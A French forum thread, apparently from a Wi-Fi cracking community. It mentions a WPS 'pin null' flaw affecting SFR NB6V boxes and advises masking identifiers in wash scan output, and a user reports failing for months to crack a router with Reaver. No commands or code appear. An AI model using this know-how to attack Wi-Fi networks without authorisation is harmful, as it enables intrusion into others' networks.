Les OUI vulnérables à la faille WPS "pin null" ont été recensés dans la discussion 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Concernant le masquage des informations, que ce soient les tiennes ou à plus forte raisons celles des autres, il est toujours prudent, sur un forum, de masquer ce qui est propre à un équipement, un usager, une personne.

Ainsi, pour ce que wash renvoie comme résultats, il me paraît prudent de "flouter" :
- "bssid", : Les trois derniers octets (comme je l'ai fait précédemment,)
- "essid" : Tout ce qui est spécifique à un AP (pour une LiveBox, tout ce qui suit "Livebox-")
- "wps_serial" : Les 5 derniers digits
- "wps_uuid" : Dans le doute, l'ensemble
- "wps_primary_device_type" : Dans le doute, l'ensemble


Merci vraiment pour les infos que tu me donne je vais regarder les lien et me renseigne, tu a effectivement raison pour le wash je n'est pas été prudent, a l'avenir je le serait. Un grand MERCI au personne d'avoir prit le temps de répondre et d'aider, je mavoue vaincue devant cette ma box 3 mois que j'essaye pas de succès, bien sûre avec la méthode < Reaver > Donc je pence que mon sujet et clos, du moin pour ma première partie pour ce qui est de la. Seconde je me fais pas d'illusion. smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
46 4895 Aujourd'hui 20:32:52 par sklerder
Hostbase V0.9 rogue AP script par koala  [ 1 2 3 4 5 ]
115 6339 14-09-2017 03:55:04 par disquette
0 611 19-08-2017 14:01:56 par Morojgovany
4 648 15-08-2017 11:41:12 par GreyBird
4 1296 11-07-2017 17:24:30 par Fab955

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.042 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]